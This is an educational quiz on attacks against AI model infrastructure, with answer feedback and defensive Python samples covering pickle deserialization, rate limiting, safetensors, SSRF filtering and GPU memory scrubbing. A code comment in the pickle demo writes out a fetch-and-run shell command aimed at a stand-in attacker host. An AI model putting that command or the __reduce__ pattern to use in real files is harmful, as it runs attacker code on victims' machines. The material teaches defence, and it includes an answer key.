Section 4 Quiz
Test Your Knowledge: Model and Infrastructure Attacks
Let’s see how much you’ve learned!
This quiz tests your understanding of serialization exploits, adversarial inputs, model theft, denial of service through unbounded consumption, infrastructure attack vectors, and the n8n CVE as a real-world example.
---
shuffle_answers: true
shuffle_questions: false
---
## A healthcare startup downloads an open-source model from a hub and loads it using `torch.load()`. Three weeks later, their security team detects a reverse shell connecting to an external server. What vulnerability was exploited?
> Hint: Think about what happens at the code level when Python deserializes a pickle file.
- [ ] The model had a backdoor that activated on specific medical queries
> A model backdoor would affect inference outputs, not establish network connections. The reverse shell indicates code execution, not model behavior.
- [x] A pickle serialization exploit -- the model file contained embedded Python code that executed arbitrary commands when deserialized by `torch.load()`
> Correct! This maps to LLM03: Supply Chain. Python's pickle module executes arbitrary code during deserialization by design. Loading a pickled model file with `torch.load()` is equivalent to running untrusted code. The safetensors format was developed to solve this problem by storing tensor data in a format that cannot execute code during loading.
- [ ] The model's API endpoint was exposed without authentication
> API exposure is a separate infrastructure risk. The attack here happened during model loading, before any API was set up.
- [ ] An adversarial input triggered the model to generate a reverse shell command
> LLMs generate text, not system commands. The reverse shell was established by executable code embedded in the model file itself during deserialization.
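The mechanism behind this question can be shown in a few lines of standard-library Python. This is a minimal, harmless sketch: pickle calls a class's `__reduce__` method to decide how to rebuild the object, and will invoke whatever callable it returns. A real malicious model file would return something like `os.system` with a shell command; here a `print` call stands in to prove that code runs the moment the file is loaded.

```python
import pickle

class MaliciousPayload:
    # __reduce__ tells pickle how to reconstruct this object:
    # "call this function with these arguments." Pickle obeys blindly.
    # A real attack would return (os.system, ("curl attacker.sh | sh",)).
    def __reduce__(self):
        return (print, ("code executed during deserialization!",))

blob = pickle.dumps(MaliciousPayload())

# The "victim" only deserializes -- yet the payload's callable runs.
pickle.loads(blob)  # prints: code executed during deserialization!
```

This is exactly what happens inside `torch.load()` when it unpickles a `.pt` file, which is why loading an untrusted pickled model is equivalent to running untrusted code.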
## An attacker sends repeated maximum-length (200,000-token) inputs to an organization's GPT-4 API endpoint. The attack racks up $50,000 in charges overnight. Which OWASP category does this map to?
> Hint: Consider the resource asymmetry -- it's cheap to send a request but expensive to process one.
- [ ] LLM01: Prompt Injection -- the attacker manipulated the model's behavior
> Prompt injection targets model behavior and outputs. This attack targets computational resources and costs without caring about what the model generates.
- [ ] LLM03: Supply Chain -- the API endpoint was compromised
> Supply chain attacks target components in the development pipeline. This is a direct resource exhaustion attack against the production API.
- [x] LLM10: Unbounded Consumption -- the attacker exploited the cost asymmetry of LLM inference by sending massive inputs that maximize compute costs
> Correct! This is context window stuffing, a technique under LLM10: Unbounded Consumption. Processing a 200,000-token input costs dramatically more than processing a 100-token input. Without per-user rate limits, billing caps, and input length restrictions, a single attacker can exhaust GPU resources or run up devastating API charges. This is the same category that the Microsoft LLMjacking case mapped to.
- [ ] LLM04: Data and Model Poisoning -- the training data was corrupted
> Data poisoning targets the training pipeline. This attack targets the inference API's resource consumption.
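The two mitigations named in the feedback -- input length caps and per-user rate limits -- can be sketched together. This is a simplified illustration, not a production limiter; the function name `admit`, the limit constants, and the in-memory log are all hypothetical choices for the example.

```python
import time
from collections import defaultdict

# Hypothetical limits -- tune for your deployment.
MAX_INPUT_TOKENS = 4_000      # reject oversized prompts outright
REQUESTS_PER_MINUTE = 20      # per-user request budget

_request_log = defaultdict(list)  # user_id -> recent request timestamps

def admit(user_id, input_tokens, now=None):
    """Return True if the request may proceed, False if it is rejected."""
    now = time.monotonic() if now is None else now

    # Length cap: a 200,000-token prompt costs the attacker almost nothing
    # to send but costs the provider dramatically more to process.
    if input_tokens > MAX_INPUT_TOKENS:
        return False

    # Sliding-window rate limit: keep only timestamps from the last minute.
    window = [t for t in _request_log[user_id] if now - t < 60]
    if len(window) >= REQUESTS_PER_MINUTE:
        _request_log[user_id] = window
        return False

    window.append(now)
    _request_log[user_id] = window
    return True
```

A real deployment would add billing alerts and a hard spend cap on top of this, since rate limiting alone bounds request volume but not cumulative cost over time.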
## What is the key advantage of the safetensors model format over pickle-based formats like PyTorch .pt files?
> Hint: Think about what fundamentally makes pickle dangerous and how safetensors avoids that risk.
- [ ] Safetensors files are smaller and load faster than pickle files
> While safetensors can be efficient, the primary advantage is security, not file size or loading speed.
- [ ] Safetensors encrypts model weights to prevent theft
> Safetensors does not encrypt weights. It stores them in a flat format that is readable but safe to load.
- [x] Safetensors stores tensor data in a simple, flat format that cannot execute code during loading, eliminating the arbitrary code execution risk inherent in pickle deserialization
> Correct! The safetensors format was developed specifically to solve the pickle serialization RCE problem (LLM03: Supply Chain). Pickle can execute arbitrary code by design -- safetensors stores only tensor data with no code execution capability. Major hubs like Hugging Face now default to safetensors and flag models using pickle serialization.
- [ ] Safetensors is the only format supported by modern model hubs
> Many hubs still support pickle-based formats for legacy compatibility. Safetensors is preferred for security but not universally required.
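Why safetensors is safe to load can be seen from its layout: an 8-byte little-endian header length, a JSON header describing each tensor's dtype, shape, and byte offsets, then the raw tensor bytes. Below is a simplified, pure-Python sketch of that idea (the helper names `save_flat`/`load_flat` are invented for illustration; the real format has additional details). The point is that loading requires only `struct.unpack` and `json.loads` -- there is nothing to execute.

```python
import json
import struct

def save_flat(path, tensors):
    """tensors: name -> (dtype_str, shape, raw_bytes)."""
    header, data, offset = {}, b"", 0
    for name, (dtype, shape, raw) in tensors.items():
        header[name] = {"dtype": dtype, "shape": shape,
                        "data_offsets": [offset, offset + len(raw)]}
        data += raw
        offset += len(raw)
    header_bytes = json.dumps(header).encode()
    with open(path, "wb") as f:
        f.write(struct.pack("<Q", len(header_bytes)))  # 8-byte header length
        f.write(header_bytes)                          # JSON metadata
        f.write(data)                                  # flat tensor bytes

def load_flat(path):
    """Loading is pure parsing: no callables, no code paths, no pickle."""
    with open(path, "rb") as f:
        (header_len,) = struct.unpack("<Q", f.read(8))
        header = json.loads(f.read(header_len))
        data = f.read()
    return {name: data[meta["data_offsets"][0]:meta["data_offsets"][1]]
            for name, meta in header.items()}
```

Contrast this with pickle, which is a small bytecode interpreter: its opcodes can look up and call arbitrary Python callables, which is precisely the capability this flat layout lacks.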
## The n8n workflow automation platform disclosed CVE-2025-68613, a Server-Side Request Forgery (SSRF) vulnerability. Why is this particularly concerning for organizations using n8n as an AI agent orchestration layer?
> Hint: Think about what n8n connects to in a typical AI deployment and what SSRF enables.
- [ ] It allows attackers to modify n8n workflow templates on public registries
> Template modification on public registries is a supply chain issue. SSRF specifically enables unauthorized network requests from the server.
- [x] n8n orchestrates AI agents' connections to databases, APIs, and internal tools -- an SSRF vulnerability lets attackers leverage those trusted connections to pivot into the internal network
> Correct! This illustrates a broader point about infrastructure security. n8n is commonly used as the orchestration layer for AI agents, connecting LLMs to internal services via trusted network paths. An SSRF vulnerability means an attacker can make the n8n server send requests to internal services, cloud metadata endpoints (like 169.254.169.254), and other resources behind the firewall -- using the same trusted connections that AI workflows rely on. The security of your AI system includes every component in the stack.
- [ ] It allows attackers to inject prompts into any LLM that n8n connects to
> SSRF enables arbitrary HTTP requests, not prompt injection. While the requests could reach LLM APIs, the core risk is broader network pivoting.
- [ ] It only affects n8n cloud deployments, not self-hosted instances
> SSRF can affect both self-hosted and cloud deployments. Self-hosted instances may be at even greater risk because they often run within internal networks with access to sensitive services.
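A common SSRF defense is to refuse outbound requests whose destination resolves to an internal address. This is a minimal sketch using only the standard library; the function name `is_internal_target` is invented for the example, and a denylist like this is a first layer, not a complete fix.

```python
import ipaddress
import socket
from urllib.parse import urlparse

def is_internal_target(url):
    """Return True if the URL resolves to a loopback, private, or
    link-local address (e.g. the 169.254.169.254 metadata endpoint)."""
    host = urlparse(url).hostname
    if host is None:
        return True  # unparseable URL -> refuse
    try:
        infos = socket.getaddrinfo(host, None)
    except socket.gaierror:
        return True  # unresolvable host -> refuse
    for info in infos:
        addr = ipaddress.ip_address(info[4][0])
        if addr.is_private or addr.is_loopback or addr.is_link_local:
            return True
    return False
```

Note that checking the name and then connecting separately is vulnerable to DNS rebinding; hardened implementations resolve once and pin the connection to that resolved IP.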
## An attacker queries a proprietary model's API with thousands of strategically chosen inputs, records the outputs, and trains a local model to replicate the original's behavior. What is this technique called and why does it matter?
> Hint: Think about what the attacker gains beyond just a copy of the model.
- [ ] Data poisoning -- the attacker corrupts the original model through repeated queries
> Sending queries doesn't corrupt the original model. The attacker is extracting information from the model, not modifying it.
- [x] Model extraction (model theft) -- the attacker creates a local copy that approximates the proprietary model's capabilities without paying training costs, and can study it offline for transferable vulnerabilities
> Correct! Model extraction maps to the model theft aspect of LLM03: Supply Chain. The distilled copy lets the attacker bypass API rate limits and costs, study the model offline to find vulnerabilities that transfer back to the original, and potentially violate data privacy if the copy retains training data characteristics. Organizations spend millions training proprietary models -- extraction steals that investment through the API.
- [ ] Adversarial input generation -- the attacker is crafting inputs to cause errors
> While the inputs are strategic, the goal is replication, not causing errors. The attacker is building a copy, not attacking the model's outputs.
- [ ] Prompt injection -- the attacker manipulates the model through crafted inputs
> Prompt injection aims to override model behavior in real time. Model extraction aims to copy model behavior permanently through systematic querying.
## Which of the following correctly describes an adversarial input attack against an LLM?
> Hint: Think about what makes the perturbation "adversarial" versus just being a bad input.
- [x] Carefully crafted perturbations that are imperceptible to humans but push the input across the model's decision boundary, causing incorrect outputs
> Correct! Adversarial inputs exploit how ML models learn decision boundaries in high-dimensional spaces (related to LLM05: Improper Output Handling). For LLMs, this includes token-level perturbations (synonyms that change behavior), typographical attacks (strategic misspellings bypassing filters), and multimodal attacks (invisible signals in images that influence text generation). They're most dangerous when combined with other attacks, like crafting prompt injection payloads that bypass input filters.
- [ ] Sending random garbage text to the model to crash the inference server
> Random garbage is not adversarial -- it's just noise. Adversarial inputs are precisely crafted to cause specific incorrect behaviors while appearing normal.
- [ ] Using extremely long prompts to exceed the model's context window
> Exceeding context windows is a resource exhaustion attack (LLM10), not an adversarial input attack. Adversarial inputs are about precision, not volume.
- [ ] Encrypting malicious prompts so the model decrypts and follows them
> Encoding attacks are a form of prompt injection, not adversarial inputs. Adversarial inputs involve imperceptible perturbations, not encoding schemes.
## A security team assessing their self-hosted AI deployment identifies three confirmed vulnerabilities: (1) their model files use pickle serialization loaded via `torch.load()`, (2) their LLM API lacks per-user rate limiting, and (3) they suspect competitors are querying their API to extract model behavior. With resources to address only one vulnerability immediately, which should the team prioritize first?
> Hint: Consider which vulnerability has the most severe potential impact -- think about what each exploit actually enables the attacker to do.
- [ ] Rate limiting gaps -- because unbounded consumption can rack up massive costs and denial of service affects all users immediately
> While unbounded consumption (LLM10) causes financial damage and service disruption, it does not compromise the integrity or confidentiality of the system. DoS is recoverable by adding rate limits after the fact. Serialization exploits enable full system compromise including data exfiltration, which is a more severe and harder-to-reverse outcome.
- [ ] Model extraction -- because losing proprietary model IP represents the greatest long-term business risk
> Model extraction (model theft) is a serious IP concern, but it is a confidentiality risk that does not give the attacker control over the organization's infrastructure. Serialization exploits enable remote code execution, which can lead to data exfiltration, lateral movement, and full system compromise -- a strictly more severe outcome than model copying.
- [x] Pickle serialization exploits -- because loading untrusted model files enables remote code execution, giving attackers full control of the inference server, access to sensitive data, and the ability to pivot to other systems
> Correct! Serialization exploits are prioritized over rate limiting and model extraction because they enable the most severe outcome: remote code execution (RCE). A pickle deserialization exploit gives the attacker arbitrary code execution with server permissions -- enabling reverse shells, credential theft, data exfiltration, and lateral movement. Rate limiting gaps cause financial damage (recoverable) and service disruption (temporary). Model extraction compromises IP (serious but contained). RCE compromises the entire infrastructure. The mitigation is also clear: migrate to safetensors format, which eliminates the code execution risk entirely.
- [ ] All three should be addressed simultaneously -- prioritization is unnecessary for confirmed vulnerabilities
> When resources are limited, prioritization is essential. These vulnerabilities have different severity profiles: serialization exploits enable RCE (full system compromise), rate limiting gaps enable financial damage (recoverable), and model extraction enables IP theft (contained). Addressing the highest-severity vulnerability first maximizes risk reduction per unit of effort.
## A GPU cluster serving multiple tenants runs an AI inference workload. Security researchers discover that GPU memory from one tenant's inference run is accessible to a subsequent tenant's request. What type of vulnerability is this?
> Hint: Think about what data resides in GPU memory during inference and what happens when that memory isn't cleared.
- [ ] Model theft -- the second tenant can extract model weights from GPU memory
> While model weights are in GPU memory, the primary concern here is inter-tenant data leakage, not model theft specifically.
- [ ] Prompt injection -- the previous tenant's prompts influence the next tenant's outputs
> Prompt injection targets model behavior through crafted inputs. GPU memory leakage is a hardware/infrastructure issue, not a prompt-level attack.
- [x] Cross-tenant data leakage -- prompts, context, and generated outputs from one tenant's inference remain in GPU memory and can be read by subsequent requests from another tenant
> Correct! This is an infrastructure attack vector involving GPU memory vulnerabilities. During inference, GPUs hold sensitive data including prompts, context, model weights, and generated outputs. If GPU memory isn't cleared between requests or between tenants, this data can leak across isolation boundaries. This is particularly dangerous in shared GPU environments (cloud inference services) and relates to both infrastructure security and LLM02: Sensitive Information Disclosure.
- [ ] Unbounded consumption -- the first tenant used too many GPU resources
> Unbounded consumption is about resource exhaustion. GPU memory leakage is about data isolation failure, regardless of resource usage levels.
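The underlying fix -- scrub shared memory before reuse -- can be illustrated with a CPU-side analogy. This is a hypothetical buffer manager, not a real GPU API; the same principle applies to device allocations (zeroing GPU buffers between tenants rather than handing them over with stale contents).

```python
class InferenceBuffer:
    """Toy stand-in for a reusable inference buffer shared across tenants."""

    def __init__(self, size):
        self._buf = bytearray(size)

    def run(self, tenant_input):
        # Write the tenant's data into the shared buffer and "run" inference.
        self._buf[:len(tenant_input)] = tenant_input
        return bytes(self._buf[:len(tenant_input)])

    def scrub(self):
        """Zero the buffer before handing it to the next tenant."""
        self._buf[:] = bytes(len(self._buf))
```

Without the `scrub()` step between requests, the next tenant who reads the buffer sees the previous tenant's prompts and outputs -- exactly the isolation failure described in this question.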